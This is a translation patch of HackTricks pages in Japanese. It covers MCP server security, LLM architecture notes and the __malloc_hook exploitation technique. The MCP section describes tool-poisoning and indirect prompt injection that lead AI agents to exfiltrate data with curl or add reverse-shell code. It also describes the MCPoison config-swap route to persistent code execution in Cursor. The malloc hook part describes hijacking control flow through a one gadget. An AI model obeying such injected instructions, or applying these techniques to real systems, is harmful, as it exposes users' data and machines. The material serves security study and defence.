From 71a40ee6361af8a6b3b2be6e8915115354f63082 Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 21 Aug 2025 21:43:03 +0000 Subject: [PATCH] Translated ['src/windows-hardening/active-directory-methodology/sccm-man --- src/AI/AI-MCP-Servers.md | 44 +- src/AI/AI-llm-architecture/README.md | 14 +- src/AI/README.md | 4 +- .../aw2exec-__malloc_hook.md | 16 +- .../arbitrary-write-2-exec/aw2exec-got-plt.md | 28 +- .../README.md | 64 +-- .../elf-tricks.md | 68 ++-- .../aslr/README.md | 47 +-- .../pie/README.md | 10 +- .../stack-canaries/README.md | 38 +- .../stack-canaries/print-stack-canary.md | 9 +- .../format-strings/README.md | 43 +- src/binary-exploitation/libc-heap/README.md | 48 +-- .../libc-heap/bins-and-memory-allocations.md | 67 ++-- .../libc-heap/fast-bin-attack.md | 23 +- .../heap-functions-security-checks.md | 65 +-- .../libc-heap/house-of-roman.md | 27 +- .../libc-heap/large-bin-attack.md | 17 +- .../libc-heap/tcache-bin-attack.md | 45 ++- .../libc-heap/unsorted-bin-attack.md | 49 +-- .../libc-heap/use-after-free/README.md | 6 +- .../rop-return-oriented-programing/README.md | 28 +- .../rop-return-oriented-programing/ret2csu.md | 16 +- .../ret2dlresolve.md | 16 +- .../ret2lib/README.md | 31 +- .../rop-leaking-libc-address/README.md | 54 +-- .../ret2vdso.md | 7 +- .../rop-syscall-execv/README.md | 16 +- .../rop-syscall-execv/ret2syscall-arm64.md | 10 +- .../README.md | 14 +- .../srop-arm64.md | 18 +- .../stack-overflow/README.md | 28 +- .../stack-overflow/ret2win/README.md | 17 +- .../stack-overflow/ret2win/ret2win-arm64.md | 13 +- .../stack-pivoting-ebp2ret-ebp-chaining.md | 48 +-- .../stack-shellcode/stack-shellcode-arm64.md | 7 +- src/crypto-and-stego/esoteric-languages.md | 2 +- .../hash-length-extension-attack.md | 18 +- .../rc4-encrypt-and-decrypt.md | 6 +- .../basic-forensic-methodology/README.md | 24 +- .../anti-forensic-techniques.md | 30 +- .../linux-forensics.md | 86 ++-- .../partitions-file-systems-carving/README.md | 46 +-- .../pcap-inspection/README.md | 44 +- .../README.md | 4 +- .../windows-forensics/README.md | 85 ++-- .../external-recon-methodology/README.md | 122 +++--- .../pentesting-network/README.md | 174 ++++---- .../pentesting-network/pentesting-ipv6.md | 111 ++++-- ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 42 +- .../pentesting-wifi/README.md | 119 +++--- .../phishing-methodology/README.md | 106 ++--- .../clipboard-hijacking.md | 11 +- .../phishing-documents.md | 16 +- .../python/bypass-python-sandboxes/README.md | 77 ++-- ...s-pollution-pythons-prototype-pollution.md | 20 +- .../firmware-analysis/README.md | 58 +-- .../bypass-bash-restrictions/README.md | 18 +- .../README.md | 46 ++- src/linux-hardening/freeipa-pentesting.md | 66 +-- .../linux-post-exploitation/README.md | 14 +- .../privilege-escalation/README.md | 205 +++++----- .../containerd-ctr-privilege-escalation.md | 7 +- .../docker-security/README.md | 100 ++--- .../README.md | 74 ++-- .../docker-security/docker-privileged.md | 26 +- .../docker-security/namespaces/README.md | 23 +- .../namespaces/cgroup-namespace.md | 33 +- .../escaping-from-limited-bash.md | 28 +- .../interesting-groups-linux-pe/README.md | 40 +- .../linux-active-directory.md | 14 +- .../linux-capabilities.md | 167 ++++---- .../nfs-no_root_squash-misconfiguration-pe.md | 46 ++- .../runc-privilege-escalation.md | 6 +- .../wildcards-spare-tricks.md | 71 +++- .../macos-red-teaming/README.md | 65 +-- .../macos-red-teaming/macos-mdm/README.md | 102 ++--- .../README.md | 31 +- .../mac-os-architecture/README.md | 14 +- .../README.md | 65 +-- .../README.md | 97 ++--- .../macos-bypassing-firewalls.md | 20 +- .../README.md | 80 ++-- .../macos-privilege-escalation.md | 25 +- .../macos-proces-abuse/README.md | 96 ++--- .../README.md | 123 +++--- .../macos-xpc/README.md | 76 ++-- .../macos-xpc/macos-xpc-authorization.md | 36 +- .../README.md | 44 +- ...s-xpc_connection_get_audit_token-attack.md | 52 +-- .../macos-library-injection/README.md | 76 ++-- .../macos-dyld-process.md | 34 +- .../macos-security-protections/README.md | 55 ++- .../macos-fs-tricks/README.md | 54 +-- .../macos-sandbox/README.md | 64 +-- .../macos-sandbox-debug-and-bypass/README.md | 69 ++-- .../macos-tcc/README.md | 97 ++--- .../macos-tcc/macos-tcc-bypasses/README.md | 93 ++--- .../android-app-pentesting/README.md | 154 +++---- ...-instrumentation-and-ssl-pinning-bypass.md | 24 +- .../avd-android-virtual-device.md | 38 +- .../react-native-application.md | 10 +- .../android-app-pentesting/tapjacking.md | 40 +- .../ios-pentesting/README.md | 197 ++++----- .../frida-configuration-in-ios.md | 26 +- .../ios-pentesting/ios-testing-environment.md | 38 +- .../11211-memcache/README.md | 37 +- .../137-138-139-pentesting-netbios.md | 9 +- .../2375-pentesting-docker.md | 26 +- .../5353-udp-multicast-dns-mdns.md | 30 +- .../5439-pentesting-redshift.md | 3 +- .../5555-android-debug-bridge.md | 48 +-- .../8089-splunkd.md | 8 +- .../9000-pentesting-fastcgi.md | 10 +- src/network-services-pentesting/9100-pjl.md | 18 +- .../9200-pentesting-elasticsearch.md | 32 +- .../nfs-service-pentesting.md | 36 +- .../pentesting-compaq-hp-insight-manager.md | 7 +- .../pentesting-kerberos-88/README.md | 2 +- .../README.md | 51 +-- .../pentesting-mysql.md | 45 ++- .../pentesting-postgresql.md | 126 +++--- .../pentesting-rdp.md | 13 +- .../pentesting-smb/README.md | 42 +- .../pentesting-smtp/README.md | 102 ++--- .../pentesting-snmp/README.md | 88 ++-- .../pentesting-ssh.md | 58 +-- .../pentesting-voip/README.md | 138 +++---- .../basic-voip-protocols/README.md | 70 ++-- .../pentesting-web/README.md | 81 ++-- .../pentesting-web/buckets/README.md | 3 +- .../buckets/firebase-database.md | 3 +- .../pentesting-web/drupal/README.md | 18 +- .../electron-desktop-apps/README.md | 68 ++-- ...solation-rce-via-electron-internal-code.md | 4 +- .../pentesting-web/flask.md | 11 +- .../pentesting-web/graphql.md | 91 ++--- .../pentesting-web/microsoft-sharepoint.md | 18 +- .../pentesting-web/nextjs.md | 106 ++--- .../pentesting-web/nginx.md | 52 +-- .../pentesting-web/php-tricks-esp/README.md | 85 ++-- .../pentesting-web/python.md | 5 +- .../pentesting-web/special-http-headers.md | 54 +-- .../pentesting-web/symphony.md | 16 +- .../pentesting-web/uncovering-cloudflare.md | 28 +- .../pentesting-web/werkzeug.md | 29 +- .../pentesting-web/wordpress.md | 73 ++-- src/pentesting-web/account-takeover.md | 30 +- .../README.md | 164 ++++---- .../browext-clickjacking.md | 15 +- src/pentesting-web/cache-deception/README.md | 51 +-- src/pentesting-web/captcha-bypass.md | 14 +- .../client-side-template-injection-csti.md | 5 +- src/pentesting-web/command-injection.md | 16 +- .../README.md | 125 +++--- src/pentesting-web/cors-bypass.md | 98 ++--- src/pentesting-web/crlf-0d-0a.md | 28 +- .../csrf-cross-site-request-forgery.md | 68 ++-- .../README.md | 46 +-- src/pentesting-web/dependency-confusion.md | 38 +- src/pentesting-web/deserialization/README.md | 180 ++++----- .../exploiting-__viewstate-parameter.md | 41 +- .../README.md | 28 +- src/pentesting-web/file-inclusion/README.md | 134 ++++--- .../file-inclusion/phar-deserialization.md | 15 +- src/pentesting-web/file-upload/README.md | 100 ++--- .../hacking-jwt-json-web-tokens.md | 60 +-- .../hacking-with-cookies/README.md | 60 +-- .../hacking-with-cookies/cookie-tossing.md | 18 +- .../http-request-smuggling/README.md | 139 +++---- src/pentesting-web/ldap-injection.md | 44 +- src/pentesting-web/login-bypass/README.md | 22 +- .../oauth-to-account-takeover.md | 66 +-- src/pentesting-web/open-redirect.md | 1 + .../postmessage-vulnerabilities/README.md | 29 +- .../proxy-waf-protections-bypass.md | 22 +- .../registration-vulnerabilities.md | 15 +- src/pentesting-web/reset-password.md | 31 +- src/pentesting-web/saml-attacks/README.md | 62 +-- ...inclusion-edge-side-inclusion-injection.md | 34 +- src/pentesting-web/sql-injection/README.md | 185 ++++++--- .../sql-injection/mssql-injection.md | 44 +- .../postgresql-injection/README.md | 23 +- .../rce-with-postgresql-extensions.md | 22 +- .../rce-with-postgresql-languages.md | 28 +- .../README.md | 116 ++++-- .../url-format-bypass.md | 16 +- .../README.md | 52 +-- .../jinja2-ssti.md | 26 +- .../unicode-injection/README.md | 18 +- .../unicode-normalization.md | 17 +- .../web-vulnerabilities-methodology.md | 6 +- .../web-vulnerabilities-methodology/README.md | 22 +- src/pentesting-web/websocket-attacks.md | 83 ++-- src/pentesting-web/xs-search.md | 169 ++++---- src/pentesting-web/xs-search/README.md | 318 +++++++-------- .../connection-pool-by-destination-example.md | 6 +- .../event-loop-blocking-+-lazy-images.md | 22 +- ...ble-stylesheet-language-transformations.md | 7 +- .../xss-cross-site-scripting/README.md | 166 ++++---- .../abusing-service-workers.md | 14 +- .../xss-cross-site-scripting/dom-xss.md | 39 +- .../iframes-in-xss-and-csp.md | 30 +- .../integer-overflow.md | 39 +- .../xxe-xee-xml-external-entity.md | 142 +++---- .../reversing-tools-basic-methods/README.md | 74 ++-- src/todo/burp-suite.md | 8 +- src/todo/hardware-hacking/jtag.md | 18 +- src/todo/other-web-tricks.md | 12 +- .../flipper-zero/fz-125khz-rfid.md | 15 +- .../radio-hacking/flipper-zero/fz-ibutton.md | 13 +- .../radio-hacking/flipper-zero/fz-infrared.md | 31 +- src/todo/radio-hacking/flipper-zero/fz-nfc.md | 10 +- src/todo/radio-hacking/ibutton.md | 6 +- src/todo/radio-hacking/infrared.md | 38 +- src/todo/radio-hacking/pentesting-rfid.md | 40 +- src/todo/radio-hacking/sub-ghz-rf.md | 32 +- .../active-directory-methodology/README.md | 222 +++++------ .../abusing-ad-mssql.md | 24 +- .../acl-persistence-abuse/README.md | 34 +- .../ad-certificates/account-persistence.md | 24 +- .../ad-certificates/certificate-theft.md | 28 +- .../ad-certificates/domain-escalation.md | 164 ++++---- .../badsuccessor-dmsa-migration-abuse.md | 7 +- .../bloodhound.md | 4 +- .../external-forest-domain-oneway-inbound.md | 6 +- .../golden-ticket.md | 8 +- .../printers-spooler-service-abuse.md | 22 +- .../resource-based-constrained-delegation.md | 26 +- ...nagement-point-relay-sql-policy-secrets.md | 26 +- .../sid-history-injection.md | 30 +- .../silver-ticket.md | 25 +- .../unconstrained-delegation.md | 13 +- .../authentication-credentials-uac-and-efs.md | 59 +-- .../README.md | 53 +-- .../uac-user-account-control.md | 74 ++-- src/windows-hardening/av-bypass.md | 82 ++-- .../basic-powershell-for-pentesters/README.md | 11 +- .../powerview.md | 4 +- src/windows-hardening/cobalt-strike.md | 61 +-- .../lateral-movement/psexec-and-winexec.md | 38 +- src/windows-hardening/ntlm/README.md | 64 +-- .../README.md | 375 +++++++++++++----- .../access-tokens.md | 31 +- .../dll-hijacking.md | 62 +-- .../dll-hijacking/README.md | 40 +- ...ritable-sys-path-+dll-hijacking-privesc.md | 50 +-- .../juicypotato.md | 18 +- .../privilege-escalation-abusing-tokens.md | 28 +- .../README.md | 32 +- ...vilege-escalation-with-autorun-binaries.md | 54 ++- .../windows-c-payloads.md | 7 +- 252 files changed, 6559 insertions(+), 5932 deletions(-) diff --git a/src/AI/AI-MCP-Servers.md b/src/AI/AI-MCP-Servers.md index 2494b66de..bfa62375a 100644 --- a/src/AI/AI-MCP-Servers.md +++ b/src/AI/AI-MCP-Servers.md @@ -1,18 +1,18 @@ -# MCPサーバー +# MCP Servers {{#include ../banners/hacktricks-training.md}} -## MPC - モデルコンテキストプロトコルとは +## What is MPC - Model Context Protocol -[**モデルコンテキストプロトコル (MCP)**](https://modelcontextprotocol.io/introduction) は、AIモデル(LLM)が外部ツールやデータソースとプラグアンドプレイ方式で接続できるオープンスタンダードです。これにより、複雑なワークフローが可能になります。例えば、IDEやチャットボットは、MCPサーバー上で関数を*動的に呼び出す*ことができ、モデルが自然にそれらを使用する方法を「知っている」かのように振る舞います。内部では、MCPはクライアント-サーバーアーキテクチャを使用し、さまざまなトランスポート(HTTP、WebSockets、stdioなど)を介してJSONベースのリクエストを行います。 +[**Model Context Protocol (MCP)**](https://modelcontextprotocol.io/introduction)は、AIモデル(LLM)が外部ツールやデータソースとプラグアンドプレイ方式で接続できるオープンスタンダードです。これにより、複雑なワークフローが可能になります。例えば、IDEやチャットボットは、モデルが自然に「知っている」かのようにMCPサーバー上の関数を*動的に呼び出す*ことができます。内部では、MCPはクライアント-サーバーアーキテクチャを使用し、さまざまなトランスポート(HTTP、WebSockets、stdioなど)を介してJSONベースのリクエストを行います。 -**ホストアプリケーション**(例:Claude Desktop、Cursor IDE)は、1つ以上の**MCPサーバー**に接続するMCPクライアントを実行します。各サーバーは、標準化されたスキーマで記述された一連の*ツール*(関数、リソース、またはアクション)を公開します。ホストが接続すると、サーバーに対して利用可能なツールを`tools/list`リクエストで尋ね、返されたツールの説明はモデルのコンテキストに挿入され、AIはどの関数が存在し、どのように呼び出すかを知ることができます。 +**ホストアプリケーション**(例:Claude Desktop、Cursor IDE)は、1つまたは複数の**MCPサーバー**に接続するMCPクライアントを実行します。各サーバーは、標準化されたスキーマで記述された一連の*ツール*(関数、リソース、またはアクション)を公開します。ホストが接続すると、サーバーに対して`tools/list`リクエストを送信し、利用可能なツールを尋ねます。返されたツールの説明は、AIがどの関数が存在し、どのように呼び出すかを知るためにモデルのコンテキストに挿入されます。 -## 基本的なMCPサーバー +## Basic MCP Server -この例ではPythonと公式の`mcp` SDKを使用します。まず、SDKとCLIをインストールします: +この例ではPythonと公式の`mcp` SDKを使用します。まず、SDKとCLIをインストールします: ```bash pip3 install mcp "mcp[cli]" mcp version # verify installation` @@ -33,13 +33,13 @@ mcp.run(transport="stdio") # Run server (using stdio transport for CLI testing) ``` これは「Calculator Server」という名前のサーバーを定義し、1つのツール`add`を持っています。関数を`@mcp.tool()`で装飾して、接続されたLLM用の呼び出し可能なツールとして登録しました。サーバーを実行するには、ターミナルで次のコマンドを実行します: `python3 calculator.py` -サーバーは起動し、MCPリクエストを待機します(ここでは簡単のため標準入力/出力を使用しています)。実際のセットアップでは、AIエージェントまたはMCPクライアントをこのサーバーに接続します。例えば、MCP開発者CLIを使用してツールをテストするためのインスペクターを起動できます: +サーバーは起動し、MCPリクエストを待機します(ここでは簡単のため標準入力/出力を使用しています)。実際のセットアップでは、AIエージェントまたはMCPクライアントをこのサーバーに接続します。たとえば、MCP開発者CLIを使用してツールをテストするためのインスペクターを起動できます: ```bash # In a separate terminal, start the MCP inspector to interact with the server: brew install nodejs uv # You need these tools to make sure the inspector works mcp dev calculator.py ``` -接続されると、ホスト(インスペクターまたはCursorのようなAIエージェント)はツールリストを取得します。`add`ツールの説明(関数シグネチャとドキュメンテーションストリングから自動生成)はモデルのコンテキストに読み込まれ、AIは必要に応じて`add`を呼び出すことができます。たとえば、ユーザーが*「2+3は何ですか?」*と尋ねると、モデルは引数`2`と`3`を使って`add`ツールを呼び出すことを決定し、結果を返すことができます。 +接続されると、ホスト(インスペクターまたはCursorのようなAIエージェント)はツールリストを取得します。`add`ツールの説明(関数シグネチャとドキュメンテーションストリングから自動生成)はモデルのコンテキストに読み込まれ、AIは必要に応じて`add`を呼び出すことができます。たとえば、ユーザーが*「2+3は何ですか?」*と尋ねると、モデルは引数`2`と`3`を使って`add`ツールを呼び出し、結果を返すことができます。 Prompt Injectionに関する詳細は次を確認してください: @@ -50,7 +50,7 @@ AI-Prompts.md ## MCP Vulns > [!CAUTION] -> MCPサーバーは、ユーザーがメールの読み取りや返信、問題やプルリクエストの確認、コードの作成など、あらゆる日常的なタスクを支援するAIエージェントを持つことを促します。しかし、これはAIエージェントがメール、ソースコード、その他のプライベート情報などの機密データにアクセスできることも意味します。したがって、MCPサーバーのいかなる脆弱性も、データの流出、リモートコード実行、または完全なシステムの侵害などの壊滅的な結果を招く可能性があります。 +> MCPサーバーは、ユーザーがメールの読み取りや返信、問題やプルリクエストの確認、コードの作成など、あらゆる日常業務を支援するAIエージェントを持つことを促します。しかし、これはAIエージェントがメール、ソースコード、その他のプライベート情報などの機密データにアクセスできることも意味します。したがって、MCPサーバーのいかなる脆弱性も、データの流出、リモートコード実行、または完全なシステムの侵害など、壊滅的な結果を招く可能性があります。 > 制御していないMCPサーバーを決して信頼しないことをお勧めします。 ### Prompt Injection via Direct MCP Data | Line Jumping Attack | Tool Poisoning @@ -77,29 +77,29 @@ return a + b ``` この説明はAIモデルによって読み取られ、ユーザーが気づかないうちに敏感なデータを抽出する`curl`コマンドの実行につながる可能性があります。 -クライアントの設定によっては、ユーザーに許可を求めることなく任意のコマンドを実行できる場合があることに注意してください。 +クライアントの設定によっては、クライアントがユーザーに許可を求めることなく任意のコマンドを実行できる場合があることに注意してください。 -さらに、説明はこれらの攻撃を容易にする他の機能を使用することを示唆する可能性があります。たとえば、データを抽出する機能がすでに存在する場合、メールを送信すること(例:ユーザーがMCPサーバーを使用してGmailアカウントに接続している場合)を示唆することができ、`curl`コマンドを実行するよりもユーザーに気づかれにくくなります。例はこの[blog post](https://blog.trailofbits.com/2025/04/23/how-mcp-servers-can-steal-your-conversation-history/)にあります。 +さらに、説明はこれらの攻撃を容易にする他の機能を使用することを示唆する可能性があります。たとえば、データを抽出する機能がすでに存在する場合、メールを送信する(例:ユーザーがMCPサーバーを使用してGmailアカウントに接続している)ことを示唆することができ、`curl`コマンドを実行するよりもユーザーに気づかれにくくなります。例はこの[ブログ投稿](https://blog.trailofbits.com/2025/04/23/how-mcp-servers-can-steal-your-conversation-history/)で見つけることができます。 -さらに、[**このblog post**](https://www.cyberark.com/resources/threat-research-blog/poison-everywhere-no-output-from-your-mcp-server-is-safe)では、ツールの説明だけでなく、タイプ、変数名、MCPサーバーからのJSONレスポンスに返される追加フィールド、さらにはツールからの予期しないレスポンスにおいてもプロンプトインジェクションを追加することが可能であることが説明されており、プロンプトインジェクション攻撃がさらにステルスで検出が難しくなっています。 +さらに、[**このブログ投稿**](https://www.cyberark.com/resources/threat-research-blog/poison-everywhere-no-output-from-your-mcp-server-is-safe)では、ツールの説明だけでなく、タイプ、変数名、MCPサーバーによって返されるJSONレスポンスの追加フィールド、さらにはツールからの予期しないレスポンスにおいてもプロンプトインジェクションを追加することが可能であることが説明されており、プロンプトインジェクション攻撃はさらにステルス性が高く、検出が難しくなります。 -### プロンプトインジェクションによる間接データ +### 間接データによるプロンプトインジェクション -MCPサーバーを使用するクライアントでプロンプトインジェクション攻撃を実行する別の方法は、エージェントが予期しないアクションを実行するようにデータを変更することです。良い例は[このblog post](https://invariantlabs.ai/blog/mcp-github-vulnerability)にあり、外部の攻撃者が公開リポジトリで問題を開くだけでGithub MCPサーバーを悪用できる方法が示されています。 +MCPサーバーを使用するクライアントでプロンプトインジェクション攻撃を実行する別の方法は、エージェントが予期しないアクションを実行するようにデータを変更することです。良い例は[このブログ投稿](https://invariantlabs.ai/blog/mcp-github-vulnerability)にあり、外部の攻撃者が公開リポジトリで問題を開くだけでGithub MCPサーバーを悪用できる方法が示されています。 -Githubリポジトリへのアクセスをクライアントに与えているユーザーは、クライアントにすべてのオープンな問題を読み取り修正するように依頼することができます。しかし、攻撃者は**悪意のあるペイロードを持つ問題を開く**ことができ、「[リバースシェルコード]を追加するプルリクエストをリポジトリに作成する」といった内容がAIエージェントによって読み取られ、コードを意図せずに危険にさらすような予期しないアクションにつながる可能性があります。プロンプトインジェクションに関する詳細は以下を確認してください: +Githubリポジトリへのアクセスをクライアントに与えているユーザーは、クライアントにすべてのオープンな問題を読み取り修正するように依頼することができます。しかし、攻撃者は**悪意のあるペイロードを持つ問題を開く**ことができ、「[リバースシェルコード]を追加するプルリクエストをリポジトリに作成する」といった内容がAIエージェントによって読み取られ、コードを意図せずに危険にさらすような予期しないアクションにつながる可能性があります。プロンプトインジェクションに関する詳細情報は以下を確認してください: {{#ref}} AI-Prompts.md {{#endref}} -さらに、[**このblog**](https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo)では、Gitlab AIエージェントを悪用して任意のアクション(コードの変更やコードの漏洩など)を実行する方法が説明されており、リポジトリのデータに悪意のあるプロンプトを注入することで(ユーザーには理解できない形でこれらのプロンプトを難読化することさえ可能です)。 +さらに、[**このブログ**](https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo)では、Gitlab AIエージェントを悪用して任意のアクション(コードの修正やコードの漏洩など)を実行する方法が説明されており、リポジトリのデータに悪意のあるプロンプトを注入することで(ユーザーには理解できない形でこれらのプロンプトを難読化することさえ可能です)。 悪意のある間接プロンプトは、被害者ユーザーが使用している公開リポジトリに存在しますが、エージェントはユーザーのリポジトリにアクセスできるため、それらにアクセスすることができます。 -### MCP信頼バイパスによる持続的コード実行(Cursor IDE – "MCPoison") +### MCP信頼バイパスによる持続的なコード実行(Cursor IDE – "MCPoison") -2025年初頭、Check Point Researchは、AI中心の**Cursor IDE**がMCPエントリの*名前*にユーザートラストを結びつけているが、その基礎となる`command`や`args`を再検証していないことを明らかにしました。この論理的欠陥(CVE-2025-54136、別名**MCPoison**)により、共有リポジトリに書き込むことができる誰もが、すでに承認された無害なMCPを任意のコマンドに変換し、*プロジェクトが開かれるたびに実行される*ことが可能になります – プロンプトは表示されません。 +2025年初頭、Check Point Researchは、AI中心の**Cursor IDE**がMCPエントリの*名前*にユーザーの信頼を結びつけているが、その基礎となる`command`や`args`を再検証していないことを明らかにしました。この論理的欠陥(CVE-2025-54136、別名**MCPoison**)により、共有リポジトリに書き込むことができる誰もが、すでに承認された無害なMCPを任意のコマンドに変換し、*プロジェクトが開かれるたびに実行される*ことが可能になります - プロンプトは表示されません。 #### 脆弱なワークフロー @@ -115,7 +115,7 @@ AI-Prompts.md } ``` 2. 被害者はCursorでプロジェクトを開き、`build` MCPを*承認*します。 -3. 後で、攻撃者はコマンドを静かに置き換えます: +3. 後で、攻撃者は静かにコマンドを置き換えます: ```json { "mcpServers": { @@ -128,14 +128,14 @@ AI-Prompts.md ``` 4. リポジトリが同期されると(またはIDEが再起動すると)、Cursorは新しいコマンドを**追加のプロンプトなしに**実行し、開発者のワークステーションでリモートコード実行を許可します。 -ペイロードは、現在のOSユーザーが実行できるものであれば何でも可能です。例えば、リバースシェルのバッチファイルやPowershellのワンライナーなどで、IDEの再起動を超えてバックドアを持続させることができます。 +ペイロードは、現在のOSユーザーが実行できるものであれば何でも可能で、例えばリバースシェルのバッチファイルやPowershellのワンライナーなどがあり、IDEの再起動を通じてバックドアを持続させます。 #### 検出と緩和 * **Cursor ≥ v1.3** にアップグレードする – パッチはMCPファイルへの**任意の**変更(ホワイトスペースでさえ)に対して再承認を強制します。 -* MCPファイルをコードとして扱う:コードレビュー、ブランチ保護、CIチェックで保護します。 +* MCPファイルをコードとして扱う: コードレビュー、ブランチ保護、CIチェックで保護します。 * レガシーバージョンの場合、Gitフックや`.cursor/`パスを監視するセキュリティエージェントを使用して疑わしい差分を検出できます。 -* MCP構成に署名するか、リポジトリの外に保存して、信頼できない貢献者によって変更されないように検討してください。 +* MCP設定に署名するか、リポジトリの外に保存して、信頼できない貢献者によって変更されないように検討してください。 ## References - [CVE-2025-54136 – MCPoison Cursor IDE persistent RCE](https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/) diff --git a/src/AI/AI-llm-architecture/README.md b/src/AI/AI-llm-architecture/README.md index 4a2b0d12d..e0aaa0a31 100644 --- a/src/AI/AI-llm-architecture/README.md +++ b/src/AI/AI-llm-architecture/README.md @@ -2,7 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -**これは非常に推奨される本** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **からの私のノートで、いくつかの追加情報が含まれています。** +**これは非常に推奨される本** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **からの私のメモで、いくつかの追加情報が含まれています。** ## 基本情報 @@ -33,8 +33,8 @@ ## 3. トークン埋め込み > [!TIP] -> この第三段階の目標は非常にシンプルです:**語彙内の各トークンに対して、モデルをトレーニングするために必要な次元のベクトルを割り当てること**。語彙内の各単語はX次元の空間内の点になります。\ -> 最初は、空間内の各単語の位置は「ランダムに」初期化され、これらの位置はトレーニング中に改善されるトレーニング可能なパラメータです。 +> この第三段階の目標は非常にシンプルです:**語彙内の各トークンにモデルをトレーニングするために必要な次元のベクトルを割り当てること**。語彙内の各単語はX次元の空間内の点になります。\ +> 最初は各単語の空間内の位置は「ランダムに」初期化され、これらの位置はトレーニング中に改善されるトレーニング可能なパラメータです。 > > さらに、トークン埋め込み中に**別の埋め込み層が作成され**、これは(この場合)**トレーニング文内の単語の絶対位置を表します**。このように、文内の異なる位置にある単語は異なる表現(意味)を持ちます。 @@ -45,7 +45,7 @@ ## 4. アテンションメカニズム > [!TIP] -> この第四段階の目標は非常にシンプルです:**いくつかのアテンションメカニズムを適用すること**。これらは、**語彙内の単語と現在トレーニング中の文内の隣接単語との関係を捉えるための多くの**繰り返し層**になります。\ +> この第四段階の目標は非常にシンプルです:**いくつかのアテンションメカニズムを適用すること**。これらは**語彙内の単語と現在トレーニング中の文内の隣接単語との関係を捉えるための多くの**繰り返し層**になります。\ > これには多くの層が使用されるため、多くのトレーニング可能なパラメータがこの情報を捉えることになります。 {{#ref}} @@ -55,7 +55,7 @@ ## 5. LLMアーキテクチャ > [!TIP] -> この第五段階の目標は非常にシンプルです:**完全なLLMのアーキテクチャを開発すること**。すべてをまとめ、すべての層を適用し、テキストを生成したり、テキストをIDに変換したり、その逆を行うためのすべての関数を作成します。 +> この第五段階の目標は非常にシンプルです:**完全なLLMのアーキテクチャを開発すること**。すべてをまとめ、すべての層を適用し、テキストを生成したり、テキストをIDに変換したり逆にするためのすべての関数を作成します。 > > このアーキテクチャは、トレーニング後のテキストのトレーニングと予測の両方に使用されます。 @@ -66,7 +66,7 @@ ## 6. 事前トレーニングとモデルの読み込み > [!TIP] -> この第六段階の目標は非常にシンプルです:**ゼロからモデルをトレーニングすること**。これには、定義された損失関数とオプティマイザを使用して、モデルのすべてのパラメータをトレーニングするために、前のLLMアーキテクチャが使用されます。 +> この第六段階の目標は非常にシンプルです:**モデルをゼロからトレーニングすること**。これには、定義された損失関数とオプティマイザを使用して、データセットをループしながらすべてのパラメータをトレーニングするために前のLLMアーキテクチャが使用されます。 {{#ref}} 6.-pre-training-and-loading-models.md @@ -93,7 +93,7 @@ ## 7.2. 指示に従うためのファインチューニング > [!TIP] -> このセクションの目標は、**テキストを生成するだけでなく、指示に従うためにすでに事前トレーニングされたモデルをファインチューニングする方法を示すこと**です。例えば、チャットボットとしてタスクに応答することです。 +> このセクションの目標は、**テキストを生成するだけでなく、指示に従うためにすでに事前トレーニングされたモデルをファインチューニングする方法を示すことです**。例えば、チャットボットとしてタスクに応答することです。 {{#ref}} 7.2.-fine-tuning-to-follow-instructions.md diff --git a/src/AI/README.md b/src/AI/README.md index d97cfe46c..ce3e9708b 100644 --- a/src/AI/README.md +++ b/src/AI/README.md @@ -40,7 +40,7 @@ AI-llm-architecture/README.md AI-Risk-Frameworks.md {{#endref}} -### AIプロンプトのセキュリティ +### AIプロンプトセキュリティ LLMsは、近年AIの使用を爆発的に増加させましたが、完璧ではなく、敵対的なプロンプトによって騙される可能性があります。これは、AIを安全に使用し、どのように攻撃するかを理解するために非常に重要なトピックです: @@ -48,7 +48,7 @@ LLMsは、近年AIの使用を爆発的に増加させましたが、完璧で AI-Prompts.md {{#endref}} -### AIモデルのRCE +### AIモデルRCE 開発者や企業がインターネットからダウンロードしたモデルを実行することは非常に一般的ですが、モデルを読み込むだけでシステム上で任意のコードを実行するのに十分な場合があります。これは、AIを安全に使用し、どのように攻撃するかを理解するために非常に重要なトピックです: diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md index 47129171b..98d6fe973 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md @@ -4,9 +4,9 @@ ## **Malloc Hook** -公式GNUサイトにあるように、変数 **`__malloc_hook`** は **`malloc()` が呼び出されるたびに呼び出される関数のアドレスを指すポインタ** であり、**libcライブラリのデータセクションに格納されています**。したがって、このアドレスが例えば **One Gadget** で上書きされ、`malloc` が呼び出されると、**One Gadgetが呼び出されます**。 +公式GNUサイトにあるように、変数**`__malloc_hook`**は、`malloc()`が呼び出されるたびに呼び出される**関数のアドレスを指すポインタ**であり、**libcライブラリのデータセクションに格納されています**。したがって、このアドレスが例えば**One Gadget**で上書きされ、`malloc`が呼び出されると、**One Gadgetが呼び出されます**。 -`malloc` を呼び出すには、プログラムがそれを呼び出すのを待つか、**`printf("%10000$c")`** を呼び出すことで、`libc` がヒープにそれらを割り当てるために `malloc` を呼び出すように、非常に多くのバイトを割り当てることができます。 +mallocを呼び出すには、プログラムがそれを呼び出すのを待つか、**`printf("%10000$c")`を呼び出すことで、libcがヒープにそれらを割り当てるためにmallocを呼び出すように、過剰にバイトを割り当てることができます**。 One Gadgetに関する詳細は以下を参照してください: @@ -15,7 +15,7 @@ One Gadgetに関する詳細は以下を参照してください: {{#endref}} > [!WARNING] -> フックは **GLIBC >= 2.34 では無効化されています**。最新のGLIBCバージョンで使用できる他の技術があります。参照: [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md)。 +> GLIBC >= 2.34ではフックが**無効になっている**ことに注意してください。最新のGLIBCバージョンで使用できる他の技術があります。参照: 